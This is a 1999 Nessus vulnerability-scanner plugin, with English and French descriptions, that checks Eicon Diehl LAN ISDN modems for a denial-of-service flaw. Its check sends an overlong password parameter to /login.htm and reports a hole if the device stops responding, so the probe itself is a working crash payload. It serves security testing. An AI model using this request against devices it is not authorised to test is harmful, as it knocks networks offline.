#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 name["english"] = "Eicon Diehl LAN ISDN modem DoS";
 name["francais"] = "Dni de service contre les modems Eicon Diehl";
 
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
It was possible to crash the remote modem by
telnetting to it on port 80 and by making
the following request :
    
    GET /login.htm?password=AA[...]AAA

To reactivate your modem, just reset it.

An attacker can use this to prevent your
network from connecting onto the internet.


Solution : change your ISDN modem.

Risk factor : High";

 desc["francais"] = "
Il s'est avr possible de faire planter le modem
distant en s'y connectant au port 80 et en faisant
la requete :

	 GET /login.htm?password=AA[...]AAA
	 
Pour le ractiver, faites un reset de votre modem.

Un pirate peut utiliser ce problme pour empecher
votre rseau de se raccorder  internet.

Solution : changez de modem.

Facteur de risque : Elev";
 
 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "overflows a remote buffer";
 summary["francais"] = "overflow d'un buffer du modem";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_require_ports("Services/www", 80);
 
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  close(soc);
  req = string("/login.htm?password=", crap(200));
  is_cgi_installed(req);
  soc2 = open_sock_tcp(port);
  if(!soc2)security_hole(port);
  else close(soc2);
 }
}			
